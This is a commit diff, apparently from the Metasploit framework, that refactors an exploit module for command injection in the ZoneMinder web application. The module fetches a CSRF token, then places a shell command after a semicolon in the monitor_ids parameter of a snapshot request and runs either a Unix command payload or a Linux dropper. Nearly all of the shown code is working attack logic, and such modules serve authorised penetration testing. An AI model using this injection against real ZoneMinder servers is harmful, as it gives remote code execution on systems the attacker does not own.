Refactoring

rapid7 · Oct 6, 2023 · 51f3289 · 51f3289
1 parent f304532
commit 51f3289
Showing 1 changed file with 25 additions and 25 deletions.
diff --git a/modules/exploits/unix/webapp/zoneminder_snapshots.rb b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -90,7 +90,7 @@ def check
     data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
     start = Time.now
     send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
       'method' => 'POST',
       'data' => data.to_s,
       'keep_cookies' => true
@@ -114,11 +114,9 @@ def execute_command(cmd, _opts = {})
     data = "view=snapshot&action=create&monitor_ids[0][Id]=;#{command}"
     data += "&__csrf_magic=#{@csrf_magic}" if @csrf_magic
     send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
       'method' => 'POST',
-      'data' => data.to_s,
-      'keep_cookies' => true,
-      'encode_params' => true
+      'data' => data.to_s
     )
     print_good('Payload sent')
   rescue ::Rex::ConnectionError
@@ -130,37 +128,39 @@ def exploit
     print_status('Fetching CSRF Token')
     begin
       res = send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
         'method' => 'GET'
       )
-      if res && res.code == 200
-        # parse token
-        @csrf_magic = get_csrf_magic(res)
-        unless @csrf_magic =~ /^key:[a-f0-9]{40},\d+/
-          fail_with(Failure::UnexpectedReply, 'Unable to parse token.')
-        end
-      else
-        fail_with(Failure::UnexpectedReply, 'Unable to fetch token.')
-      end
-      print_good('Got Token')
-      # send payload
-      print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
-      case target['Type']
-      when :unix_cmd
-        execute_command(payload.encoded)
-      when :linux_dropper
-        execute_cmdstager
-      end
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
+
+    if res && res.code == 200
+      # parse token
+      @csrf_magic = get_csrf_magic(res)
+    else
+      fail_with(Failure::UnexpectedReply, 'Unable to fetch token.')
+    end
+    print_good("Got Token: #{@csrf_magic}")
+    # send payload
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
   end
 
   private
 
   def get_csrf_magic(res)
     return if res.nil?
 
-    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text
+    token = res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text
+    unless token =~ /^key:[a-f0-9]{40},\d+/
+      fail_with(Failure::UnexpectedReply, 'Unable to parse token.')
+    end
+    token
   end
 end